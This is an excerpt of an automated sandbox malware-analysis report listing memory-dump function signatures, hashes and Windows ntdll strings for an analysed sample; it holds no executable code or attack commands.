                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fa399dbf7fa0d3a1260b4ce0c42058de29654d497810b08f0df8326b398da5a1
                                                                    • Instruction ID: b1d4e0057633f6ac5d8ac6b54cc28d5ac5c37f085bdacc8e89e073ff36a484bd
                                                                    • Opcode Fuzzy Hash: fa399dbf7fa0d3a1260b4ce0c42058de29654d497810b08f0df8326b398da5a1
                                                                    • Instruction Fuzzy Hash: 4DF06270A0124EDFCB04EFA9C955E9EB7B4FF58700F008159B955EB395DA74EA01CB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 305fa05a1ed17b78b32b7c36e87ecc00c84d3b9c7e2a2e6578ab6f91f097f5fd
                                                                    • Instruction ID: 1217e6185cd5d1a7955b5acdb0f768c8cf08c8d0c31437e908221376182070f0
                                                                    • Opcode Fuzzy Hash: 305fa05a1ed17b78b32b7c36e87ecc00c84d3b9c7e2a2e6578ab6f91f097f5fd
                                                                    • Instruction Fuzzy Hash: 3AF0B4319366E39FE732EB5CC454B257BD4BB00638F09496ADD49AF512C724D880CE51
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 38de555fd2d660e10908014c40c4eec1e634557f5b07a1803a6be7eca608ed52
                                                                    • Instruction ID: cf15bab4ce121b0a0691df90949192a097c6bd638169ef76722f3a25daa6456a
                                                                    • Opcode Fuzzy Hash: 38de555fd2d660e10908014c40c4eec1e634557f5b07a1803a6be7eca608ed52
                                                                    • Instruction Fuzzy Hash: 70F0DC27415BE14BDF327B3CFC503C17F51A381010F09208CD5A257305C6348483C364
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4e5fff8c6e36d128405bf13acb4b5319c9005f21db515f36be185172ad2bd77
                                                                    • Instruction ID: 939da9ed8495e8e0a454f8aa3cddac81a81844b7c013c2506e3ed55e396df733
                                                                    • Opcode Fuzzy Hash: e4e5fff8c6e36d128405bf13acb4b5319c9005f21db515f36be185172ad2bd77
                                                                    • Instruction Fuzzy Hash: A9F0E2716116929FEB229F1CC1C8F997BD4BF807A0F18A866D806CF512C660E880CA59
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                    • Instruction ID: 9141529adf090fc7df2e3b77962df8b40bf25989dfed0a40c8c8ca4d0f595765
                                                                    • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                    • Instruction Fuzzy Hash: 00E09232300A026FE7129E998C80F47776EAFD2B10F04407DB5045E251CAE29C1982A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                    • Instruction ID: a4c5fa32f601598f9a7b70a68fd371c61306458336f00092782a416e5462a083
                                                                    • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                    • Instruction Fuzzy Hash: BAF0E572100204DFE3218F09DE40F52B7F8EB05365F0AC026E6088B260D3BAEC80CBA0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction ID: 4b8a3b3a549facf84c8d76828e724944ff5d5c2af5b6caac76dd35dea36ff91b
                                                                    • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                    • Instruction Fuzzy Hash: 99F0E53A204741DBEB16EF19C450A997BE4FB81350B010454F8468F351D731E981CB94
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                    • Instruction ID: 56a9831e58b6fc8e1c84d1d4df09c0312a254f5bc9cf55826af998fa0e61419f
                                                                    • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                    • Instruction Fuzzy Hash: 1DE09232254146ABD7322A598840BBA77A7BBD07A0F150429E2028F252DBB0DC40C798
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: InitializeThunk
                                                                    • String ID:
                                                                    • API String ID: 2994545307-0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8c496673b35395332eaae2eef3f64d1e086d24457c6bee8e41ff2a2afac42873
                                                                    • Instruction ID: b3e24e6bfb00824b9d63647605c8368d9095f3a1a1d42b42ecd033d018fb289d
                                                                    • Opcode Fuzzy Hash: 8c496673b35395332eaae2eef3f64d1e086d24457c6bee8e41ff2a2afac42873
                                                                    • Instruction Fuzzy Hash: 95900229211410030115B55C07045070096A7D5361359C421F1019950CD66189615322
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3f90e7ca3869a567241a8f980ba6b5797ad57d478926871c7fb7923c97db52d1
                                                                    • Instruction ID: 2cc5e1769e7b9d7e53b555cdb1cce729bce3292ff3f94ba4c9d30ddcbeac8887
                                                                    • Opcode Fuzzy Hash: 3f90e7ca3869a567241a8f980ba6b5797ad57d478926871c7fb7923c97db52d1
                                                                    • Instruction Fuzzy Hash: 94900229221410020155B55C060450B0495B7D6361399C415F141A990CC66189655322
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9570c4a60def62b8dea548dd44aa6eb73c1460508f978ed9f4fdbd5c004110e8
                                                                    • Instruction ID: 37f7a9fee96abeb34290f69e890b05c8c7d254dd1c62f735639679ad25f6b6ae
                                                                    • Opcode Fuzzy Hash: 9570c4a60def62b8dea548dd44aa6eb73c1460508f978ed9f4fdbd5c004110e8
                                                                    • Instruction Fuzzy Hash: 2D9002A5201550924510B25C8404B0A4555A7E0211B59C416E1058960CC56589519336
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 69521482d6684e7725c9782cd01abe9464f134195c6ada2f5ce7752e008fba73
                                                                    • Instruction ID: 47c5f00998aac41b62035823b05643fa0c9279b69332b22703080bb1a5e4c743
                                                                    • Opcode Fuzzy Hash: 69521482d6684e7725c9782cd01abe9464f134195c6ada2f5ce7752e008fba73
                                                                    • Instruction Fuzzy Hash: 7790022D21341002D190715C540860A0055A7D1212F99D815E0019958CC95589695322
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 47c3bbfc78e12a61fed4518660b5f6c4791c331775382fd1788a2bc4ef76fa9a
                                                                    • Instruction ID: 49090b530199d266efea1e04afe653f0616f887ac64cb3505a6d4fdfe35e5dae
                                                                    • Opcode Fuzzy Hash: 47c3bbfc78e12a61fed4518660b5f6c4791c331775382fd1788a2bc4ef76fa9a
                                                                    • Instruction Fuzzy Hash: 9E90022520545442D110755C5408A060055A7D0215F59D411E1068995DC6758951A332
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cef44e369f7a724232f365743658823075510410a2ff6da233de99bb90dafc63
                                                                    • Instruction ID: 003e0a0c469960570e95c4795da5b50be62ab93bc33274480a23d24542a3b77e
                                                                    • Opcode Fuzzy Hash: cef44e369f7a724232f365743658823075510410a2ff6da233de99bb90dafc63
                                                                    • Instruction Fuzzy Hash: D490043530141003D150715C541C7074055F7F1311F5DD411F041CD54CDD55CD575333
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3bb55dced4c1607111d4dfd1ecd9071a42f43063669a6222933b3a2d8c677328
                                                                    • Instruction ID: 45ce003cd55243c63d1f39bc240dbe23a571fa1ffbe42c591d0cd1aaf971f15e
                                                                    • Opcode Fuzzy Hash: 3bb55dced4c1607111d4dfd1ecd9071a42f43063669a6222933b3a2d8c677328
                                                                    • Instruction Fuzzy Hash: 0A900225242451525555B15C44045074056B7E0251799C412E1418D50CC5669956D722
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d29575b6a49875b70e24090dc519c47f84f1553756f713c633d7c2e661d0ff21
                                                                    • Instruction ID: 3bd21ad61a9da3976f3229dde43a864899cce9ae808ae5923496ec5b882ce71b
                                                                    • Opcode Fuzzy Hash: d29575b6a49875b70e24090dc519c47f84f1553756f713c633d7c2e661d0ff21
                                                                    • Instruction Fuzzy Hash: 6790023524141402D151715C44046060059B7D0251F99C412E0428954EC6958B56AB62
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 481bf5e0f9cf128ec23f34ba58134deb0525a17087a2b46029d73f591ce76f83
                                                                    • Instruction ID: 5ad53a47ef9632328dfc4614622b520689a99ea7047402279f285cb901c72c2e
                                                                    • Opcode Fuzzy Hash: 481bf5e0f9cf128ec23f34ba58134deb0525a17087a2b46029d73f591ce76f83
                                                                    • Instruction Fuzzy Hash: 9690023520141842D110715C4404B460055A7E0311F59C416E0128A54DC655C9517722
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4f3809af1c4d46895bcd0bfec92b27934e67fe06eead9bd6edff3dd3ec625df1
                                                                    • Instruction ID: 9eb022f6520424344e46281db514b915e237af336d66f283a2c93113a5970aaa
                                                                    • Opcode Fuzzy Hash: 4f3809af1c4d46895bcd0bfec92b27934e67fe06eead9bd6edff3dd3ec625df1
                                                                    • Instruction Fuzzy Hash: 2F90022560541402D150715C54187060065A7D0211F59D411E0028954DC6998B5567A2
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 359a228fde8aa5c8a9147f37422c287482cbf150f10b8804db849ea362b7cd33
                                                                    • Instruction ID: 7eff0d2e098ace29d7c24cdaf2292baab081f04cafa83890a8848aba3e3b445b
                                                                    • Opcode Fuzzy Hash: 359a228fde8aa5c8a9147f37422c287482cbf150f10b8804db849ea362b7cd33
                                                                    • Instruction Fuzzy Hash: 7290023520141403D110715C55087070055A7D0211F59D811E0428958DD69689516322
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 01897571e726e767052c3cda1faa72584f8a3956b5e3e83d1a06f8c116ea594a
                                                                    • Instruction ID: 303edd12b814abf2e5f7c1ec4d428fb26fb6dbd27ca94aa59facf6d8010f3f48
                                                                    • Opcode Fuzzy Hash: 01897571e726e767052c3cda1faa72584f8a3956b5e3e83d1a06f8c116ea594a
                                                                    • Instruction Fuzzy Hash: 0990023520141402D110759C54086460055A7E0311F59D411E5028955EC6A589916332
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: fdf2d7cdda4f9ecc252c3be400549aa06541bd4841cbac8ac0387225a24b382c
                                                                    • Instruction ID: ca4f460cd5f81b4f17d5e953e99ce3b55a748ba9e6201684f4ad31b9dcf7a4fc
                                                                    • Opcode Fuzzy Hash: fdf2d7cdda4f9ecc252c3be400549aa06541bd4841cbac8ac0387225a24b382c
                                                                    • Instruction Fuzzy Hash: 5090026521141042D114715C44047060095A7E1211F59C412E2158954CC5698D615326
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 44b22478a940faab647defd8fd98a51323cb3e41e07077d302a5e0068030e6a6
                                                                    • Instruction ID: bc5e5463c6dc5ede0d9b31255e8731514c1262391e46e6b5ffe3dbe765ded214
                                                                    • Opcode Fuzzy Hash: 44b22478a940faab647defd8fd98a51323cb3e41e07077d302a5e0068030e6a6
                                                                    • Instruction Fuzzy Hash: 1090026534141442D110715C4414B060055E7E1311F59C415E1068954DC659CD526327
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a10cf9d6407772faa3b1bae0cd78a10c18745aa9f16c6298a2bfa5d54cb711a7
                                                                    • Instruction ID: 0944de100b1a3f77283c4b1bd0ea3edfc4a0a2d492d3ca576e66327da3f0d93c
                                                                    • Opcode Fuzzy Hash: a10cf9d6407772faa3b1bae0cd78a10c18745aa9f16c6298a2bfa5d54cb711a7
                                                                    • Instruction Fuzzy Hash: C7900225211C1042D210756C4C14B070055A7D0313F59C515E0158954CC95589615722
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 06eed9d2c9a658034920bfed6f5d946849937345c37cc8c40bc752c0e0e27e7f
                                                                    • Instruction ID: 5e2cc1764568195f58c9f33a83c4cc1b847e7f09f232730eba14493364ca329f
                                                                    • Opcode Fuzzy Hash: 06eed9d2c9a658034920bfed6f5d946849937345c37cc8c40bc752c0e0e27e7f
                                                                    • Instruction Fuzzy Hash: 2E90023520181402D110715C481470B0055A7D0312F59C411E1168955DC66589516772
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 27155ed496dd17638d3bd7fca6b7ad871e4ceb6c82bca3cd5fa44694fcf631e5
                                                                    • Instruction ID: e0ea84651c3cb7247077ebee5433923ae9a813423f0fa0bda35f67d92d9c31c8
                                                                    • Opcode Fuzzy Hash: 27155ed496dd17638d3bd7fca6b7ad871e4ceb6c82bca3cd5fa44694fcf631e5
                                                                    • Instruction Fuzzy Hash: 18900225601410424150716C88449064055BBE1221759C521E099C950DC59989655766
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a11f49547008443ff42557cd559ce53454daa0ea4942a877005f38abed00f955
                                                                    • Instruction ID: 8b3c17b36e45fdb5c12aaa3563d8486413c61b9f3170009967e8015eea2c0f01
                                                                    • Opcode Fuzzy Hash: a11f49547008443ff42557cd559ce53454daa0ea4942a877005f38abed00f955
                                                                    • Instruction Fuzzy Hash: DE90023520181402D110715C48087470055A7D0312F59C411E5168955EC6A5C9916732
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3587164f3df0bf7cff07464877915c5ea5abfd6dad1209e4eae6a75b6ba9ab8e
                                                                    • Instruction ID: 004754c515325bc5d3f66a62c233dbbac3a383cc471ba0c1ec44efe91057b8d2
                                                                    • Opcode Fuzzy Hash: 3587164f3df0bf7cff07464877915c5ea5abfd6dad1209e4eae6a75b6ba9ab8e
                                                                    • Instruction Fuzzy Hash: 5190022530141402D112715C44146060059E7D1355F99C412E1428955DC6658A53A333
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    Strings
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015F46FC
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015F4742
                                                                    • ExecuteOptions, xrefs: 015F46A0
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 015F4787
                                                                    • Execute=1, xrefs: 015F4713
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015F4655
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015F4725
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 015F02E7
                                                                    • RTL: Re-Waiting, xrefs: 015F031E
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 015F02BD
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                    • API String ID: 0-2474120054
                                                                    Strings
                                                                    • RTL: Re-Waiting, xrefs: 015F7BAC
                                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 015F7B7F
                                                                    • RTL: Resource at %p, xrefs: 015F7B8E
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 0-871070163
                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015F728C
                                                                    Strings
                                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 015F7294
                                                                    • RTL: Re-Waiting, xrefs: 015F72C1
                                                                    • RTL: Resource at %p, xrefs: 015F72A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2441681061.0000000001550000.00000040.00001000.00020000.00000000.sdmp, Offset: 01550000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_1550000_BcF3o0Egke.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                    • API String ID: 885266447-605551621
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
